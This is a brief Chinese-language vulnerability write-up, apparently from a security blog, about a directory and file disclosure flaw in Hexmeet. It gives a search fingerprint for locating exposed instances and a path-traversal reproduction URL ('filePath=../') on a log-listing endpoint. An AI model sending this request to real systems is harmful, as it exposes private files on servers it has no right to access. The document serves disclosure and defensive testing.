Hexmeet list 目录文件泄露漏洞
# Hexmeet list 目录文件泄露漏洞
## 漏洞描述
Hexmeet某个文件 list参数 存在目录文件泄露漏洞,攻击者通过漏洞可以获取一些敏感信息
## 漏洞影响
Hexmeet
## 网络测绘
body...
Hexmeet list 目录文件泄露漏洞
漏洞描述
Hexmeet某个文件 list参数 存在目录文件泄露漏洞,攻击者通过漏洞可以获取一些敏感信息
漏洞影响
Hexmeet
网络测绘
body="/him/api/rest/v1.0/node/role"
漏洞复现
登陆页面如下
访问Url
/him/api/rest/V1.0/system/log/list?filePath=../
- 发表于 2024-07-12 18:46:05
- 阅读 ( 1733 )
- 分类:Web应用
带头大哥
456 篇文章